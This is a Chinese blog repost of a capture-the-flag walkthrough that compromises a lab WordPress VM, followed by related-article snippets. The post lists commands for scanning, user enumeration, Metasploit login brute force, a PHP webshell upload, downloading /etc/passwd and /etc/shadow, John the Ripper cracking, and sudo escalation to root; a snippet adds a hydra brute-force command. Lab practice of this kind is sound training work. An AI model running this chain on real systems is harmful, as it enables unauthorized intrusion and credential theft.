CTF—攻防练习之HTTP—暴力破解

最新推荐文章于 2024-07-17 15:37:20 发布
最新推荐文章于 2024-07-17 15:37:20 发布
阅读量366 收藏 1
点赞数
原文链接:http://www.cnblogs.com/zhaoyixiang/p/11055545.html
版权

攻击机:192.168.32.152

靶机:192.168.32.164

 

首先nmap,nikto -host ,dirb 扫描开放带端口,探测敏感文件,扫描目录

开放了21,22,80端口,看到一个敏感目录secret

打开发现访问里面界面会跳转 

vitcsec,但是打不开,设置一下host

gedit /etc/hosts

即可直接访问网页中内容

打开login

我们可以用metasploit对此进行暴力破解
use auxiliary/scanner/http/wordpress_login_enum
set username XX
set passfile /usr/share/wordlists/dirb/common.txt
set targeturi /secret/
set rhosts 192.168.32.164
exploit

我们暴力破解前不知道user,我们可以先用wpscan确认一下user

wpscan --url www.vtcsec.com/secret/ --enumerate u 
确认user为admin

利用msfconsole开始暴力破解:
跑出密码也为admin,登录上去,找到上传点,制作一个phpwebshell,上传上去
再执行此shell
http://192.168.32.164/secret/wp-content/themes/twentyseventeen/archive.php
成功拿到shell!

此时再想办法提权

这里我们可以用返回shell下载passwd和shadow文件,再把文件转换为cracked用john破解出密码

download /etc/passwd
download /etc/shadow

unshadow passwd shadow > cracked

john cracked
得到用户marlinspike,密码也是marlinspike

 

再返回shell界面,开启终端 python -c "import pty;pty.spawn('/bin/bash')"
提权

su -marlinspile
sudo -l
sudo bash  最中得到root权限

 

转载于:https://www.cnblogs.com/zhaoyixiang/p/11055545.html

weixin_30642029
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
九头蛇hydra爆破http示例
墨痕诉清风的博客
02-23 3066
简单,一看必会
HTTP Basic认证 爆破
diechusi8056的博客
01-12 1679
基于HTTP Basic认证的爆破网上有好多神器可以用,比如Burp Hydra等等。这里推荐一个小巧的pYTHON写的小工具,htpwdScan usage: htpwdScan.py [options] * An HTTP weak pass scanner. By LiJieJie * optional arguments: -h, --he...
PKav HTTP Fuzzer 爆破带有简单验证码的系统
热门推荐
Geekwei的博客
04-25 2万+
登录窗口设置了验证码,一般的暴力破解工具还不能绕过验证码,这下就不得不介绍一款国产神器Pkav HTTP Fuzzer ,哈哈,没错,前面我那是记的流水账,这才是我真正想同大家分享的。PKav HTTP Fuzzer 能爆破带有简单验证码的后台,下面我就给大家演示下如何使用PKav HTTP Fuzzer。
什么是HTTP协议攻击
最新发布
weixin_68778384的博客
07-17 274
HTTP协议攻击是指利用HTTP(HyperText Transfer Protocol,超文本传输协议)的特性和漏洞,对网站、Web应用或服务器发起的一系列恶意行为,旨在破坏、窃取数据、拒绝服务或进行其他形式的网络攻击。HTTP协议作为Web服务的基础协议,在客户端(如浏览器)和服务器之间传输信息,使得我们能够浏览网页、提交表单、下载文件等。然而,其无状态性和基于请求-响应的模型也带来了不少安全隐患。
Kurl——轻量化http-authentication在线暴破工具
weixin_59086772的博客
06-29 431
雨笋教育又来给大家分享渗透工具了,安全加固必备工具!操作步骤往下看: 0x00:背景 HTTP认证(HTTP-Authentication,后文统称http-auth)是一种标准化的HTTP安全加固方法(RFC 7235等),虽然不怎么常用,因为WEB服务器的页面通常情况下都采用匿名认证方式,即允许所有人访问(如果服务器或者防火墙没有进行IP限制)。与其他基于密码的身份认证方式一样(如果未引入其它认证因子),http-auth同样存在无法核实用户是否为真实可信的用户。虽然http-auth技术并不常用,
【htpwdScan 是一个HTTP暴力破解、撞库测试工具。】
pqz1425374181的博客
03-23 9312
htpwdScan 是一个HTTP暴力破解、撞库测试工具。
ctf网络安全攻防练习
12-04
【网络安全攻防CTF竞赛】 CTF(Capture The Flag)是网络安全领域中一种流行的竞赛形式,它将攻防技术融入到竞技游戏中,参赛者通过解密、逆向工程、漏洞挖掘等多种技能来获取“旗标”(Flag),从而得分。这种...
CTF常用工具crc暴力破解
01-29
CTF常用工具crc暴力破解,根据不同需求选择不同字节的爆破密码,大大减少了爆破加密压缩包的时间可以实现不解密直接爆破出文件内的具体内容。
基于python的网络攻防平台(CTF)设计与实现
07-30
网络攻防演练系统是基于python中flask框架下平台,该平台借助于网上各种CTF靶场设计框架进行构想,搭建一个CTF解题模式为主的网络攻防平台。系统主要完成以下几个模块:用户登录与注册系统模块、用户个人解答详情...
网络安全攻防大赛ctf题目
03-09
网络安全攻防大赛CTF(Capture The Flag)是一种流行的竞赛形式,旨在提升参赛者的网络安全技能,包括漏洞挖掘、密码学、取证分析、网络嗅探等多个领域。这类比赛通常分为多个环节,如逆向工程、Web安全、密码学、二...
CTF-入门练习
10-30
这个“CTF-入门练习题”很可能包含了一系列这样的挑战,旨在帮助初学者提升在网络安全领域的技能。 【网络攻防】 网络攻防CTF中的核心部分,涉及攻击者与防御者的对抗。攻击者可能试图寻找系统漏洞,进行SQL注入...
一款破译office密码的小工具
03-02
一款破译office密码的小工具一款破译office密码的小工具一款破译office密码的小工具一款破译office密码的小工具
黑客之路-使用hydra进行简单的密码爆破
坐公交也用券
10-10 3464
需要用到的工具:hydra爆破工具、字典 指定用户名 hydra -l root -P pass.txt mysql://172.17.0.2 使用字典用户名 hydra -l root -P pass.txt mysql://172.17.0.2
【图解HTTP】——Web的攻击技术
weixin_46146755的博客
03-03 4014
互联网上的攻击大都将Web站点作为目标 1 HTTP协议本身不存在安全性问题,应用HTTP协议的服务器和客户端,以及运行在服务器上的Web应用等资源才是攻击目标 HTTP不具备必要的安全功能,仅是一个通用的单纯协议机制,开发者需要自行设计并开发认证及会话管理功能来满足Web应用的安全 容易被攻击者滥用的安全漏洞的Bug: 在客户端即可篡改请求 Web应用可能会接收到与预期数据不相同的内容 在HTTP请求报文内加载攻击代码,就可以发起对Web应用的攻击 通过URL查询字段或表单、HTTP首部、Cookie等
WEBSHELL姿势之不安全的HTTP方法(渗透实验)
forbidd3n,keep going
10-25 4535
前言 Web服务器(以IIS为例)在没有任何设置是,使用OPTIONS命令,可以返回所有能够响应的HTTP方法,如OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK。 实验要求 任务:获取目标机上的两个文件(key1.txt和key2.txt),在C盘的根目录下存储有两个敏感文件(key1.txt,key2.
CTF练习HTTP服务之暴力破解
qq_43233085的博客
12-01 2491
CTF练习HTTP服务之暴力破解环境准备信息收集暴力破解 靶机地址: 链接: https://pan.baidu.com/s/1VODQKtxUrtLp8fl-v2x-bQ 提取码: og4g 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为192.168.137.176 查看靶机的IP,为192.168.137.176 ...
CTF攻防练习HTTP—18PUT上传漏洞
mutou990的博客
07-31 1786
主机:192.168.56.103 靶机:192.168.56.105 中间件PUT漏洞 包括apache,tomcat,IIS等中间件设置支持的HTTP方法(get,post,head,delete,put等) 每一个开放了HTTP方法都有其对应功能,PUT方法可以直接从客户机上传文件到服务器,如果中间件开放了 HTTP中的PUT方法,那么就可以利用上传webshell到服务器对应目录 一、信息探测 扫描靶机端口: 然后常规方法nikto -host ,dirb探测敏感文件,owasp zap扫web漏
各类服务密码爆破
m0_62207482的博客
12-16 945
口令(密码)就相当于进入家门的钥匙,当他人有一把可以进入你家的钥匙,想想你的安全、你的财务、你的隐私、害怕了吧。如果能通过比较合理的条件,筛选或者过滤掉一些全字符组合的内容,就会大幅降低爆破的成本。这是最原始,粗暴的破解方法,根据运算能力,如果能够承受的起时间成本的话,最终一定会爆破出密码。人们在设置密码的时候,往往为了便于记忆,密码的内容和组合会与个人信息有关,比如常见的密码组合“名字+生日”。下图为,根据提供的用户信息,使用亦思社会工程学字典生成器生成的用户可能使用的密码,通过此字典进行密码破解。
前端安全问题——暴破登录
Jack, what else can you do besides holding your little darling?
03-22 2387
声明:本文仅供学习和研究用途,请勿用作违法犯罪之事,若违反则与本人无关。暴力破解登录是一种常见的前端安全问题,属于未授权访问安全问题的一种,攻击者尝试使用不同的用户名和密码组合来登录到受害者的账户,直到找到正确的用户名和密码组合为止。攻击者可以使用自动化工具,如字典攻击、暴力攻击等来加快攻击速度。这种攻击通常针对用户使用弱密码、没有启用多因素身份验证等情况。
CTF攻防系统框架有那些
03-25
常见的CTF攻防系统框架包括: 1. PicoCTF:由卡内基梅隆大学编写的初学者级CTF挑战平台,内容涵盖密码学、网络安全、数字取证等多个领域。 2. CTFd:开源的CTF比赛平台,支持多种题型和选手管理功能。 3. Scorebot:由NCC Group编写的自动化CTF攻防系统,可根据比赛规则自动评分和排名。 4. RootTheBox:基于Docker的虚拟漏洞实验室,具备靶场搭建、攻击防守等功能。 5. CyberRange:由美国国家安全局开发的仿真攻防系统,支持多种攻击场景和网络拓扑。 6. CTF365:基于云计算的CTF攻防平台,可让用户选择不同的攻击场景进行练习和比赛。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值